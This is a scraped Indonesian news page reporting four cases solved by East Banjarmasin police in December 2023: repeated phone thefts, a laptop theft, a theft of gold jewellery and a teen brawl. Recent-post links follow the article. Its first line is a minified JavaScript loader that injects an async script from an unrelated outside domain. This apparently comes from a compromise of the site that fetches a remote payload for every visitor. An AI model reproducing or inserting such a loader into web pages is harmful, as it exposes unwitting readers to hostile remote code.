(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kriminal Banjarmasin

4 Kasus Viral Diungkap Polisi di Banjarmasin, Tangkap Emak-emak Pencuri HP hingga Tawuran Remaja


KANALKALIMANTAN.COM, BANJARMASIN – Kepolisian Sektor (Polsek) Banjarmasin Timur mengungkap empat tindak kejahatan yang viral di media sosial dalam waktu cepat.

Menurut keterangan yang disampaikan Kapolsek Banjarmasin Timur AKP Eru Alsepa hanya dalam waktu sepekan, pihak kepolisian berhasil mengungkap empat kasus kriminal yang menonjol.

Salah satunya adalah kasus pencurian handphone yang terjadi secara berulang kali yang dilakukan oleh seorang perempuan berinisial TA (33).

Dari hasil introgasi polisi, TA diduga telah melakukan aksi pencurian lebih dari 10 kali dan hasil curian dijual kepada seorang perempuan lain berinisial ZA (27).

Baca juga: Tilep Dana BOS, Pengawas SD di Tapin Menangis Dituntut 15 Bulan Penjara

TA (33) ditangkap pada Selasa (12/12/2023) di Jalan Tatah Belayung Baru RT 04 Kecamatan Kertak Anyar Kabupaten Banjar. Sementara ZA (27) selaku penadah handphone curian ditangkap setelahnya.

Kasus kedua yang berhasil diungkap adalah pencurian laptop yang terjadi pada Rabu (6/12/2023), pada sebuah kos di Jalan Pramuka Gang Teratai I Kecamatan Banjarmasin Timur.

Seorang lelaki dipanggil Tole (34) menjadi pelaku dalam peristiwa pencurian tersebut. Ia berhasil diamankan bersama barang bukti setelah hasil pencurian digadaikan kepada ER (35).

Tole dan ER telah ditangkap oleh Unit Reskrim Polsek Banjarmasin Timur pada Jumat (8/12/2023) lalu.

Baca juga: Warga Minta Miras dan Narkoba di Banjarbaru Diberantas Habis

Pencurian tas yang berisi perhiasan emas 80 gram, handphone, dan uang tunai adalah kasus ketiga yang berhasil diungkap.

Peristiwa itu terjadi di Jalan Pekapuran Raya Gang Melati 3 pada Jum’at (15/12/2023) lalu.

Pelakunya adalah AJ (30) yang kemudian menyerahkan diri ke Polsek pada Sabtu (16/12/2023).

Terakhir, kasus perkelahian antar remaja di depan Indomaret Keramat Raya Banjarmasin, Minggu (17/12/2023) lalu.

Baca juga: Lewati Polisi Berpatroli, Pemuda Mabuk Tertangkap Bawa Tiga Bilah Sajam

Menurut keterangan polisi, para pelaku tawuran yang rata-rata masih remaja telah diberikan pembinaan oleh pihak kepolisian dengan melibatkan kedua orang tua, guru, serta lurah setempat.

Proses penanganan lebih lanjut akan diserahkan kepada kedua orangtua, guru, dan tokoh masyarakat setempat guna pembinaan berkelanjutan.

Kapolsek Banjarmasin Timur mengatakan komitmen pihaknya untuk terus melakukan upaya pencegahan dan penegakan hukum mencegah gangguan kamtibmas.

Pihaknya juga mengimbau kepada masyarakat agar tetap menjaga ketertiban dan keamanan, terutama menjelang Natal dan Tahun Baru 2024.

Baca juga: 7 Rekomendasi Merk Handuk Tebal yang Bagus dan Lembut

“Kami akan selalu ada untuk memberikan rasa aman dan nyaman kepada masyarakat,” tutup Kapolsek. (Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : bie


Muhammad Andi

Recent Posts

25 Anggota PPK Kota Banjarbaru Dilantik, Langsung Bekerja Membentuk Sekretariat

KANALKALIMANTAN.COM, BANJARBARU - Komisi Pemilihan Umum (KPU) Kota Banjarbaru resmi melantik 25 orang anggota Panitia… Read More

3 jam ago

Kearifan Lokal Kalsel Harus Dibaca dan Ditulis Generasi Muda

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Perpustakaan dan Kearsipan Provinsi Kalimantan Selatan (Kalsel) menggelar acara sosialisasi budaya… Read More

14 jam ago

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

16 jam ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

16 jam ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

16 jam ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

18 jam ago

This website uses cookies.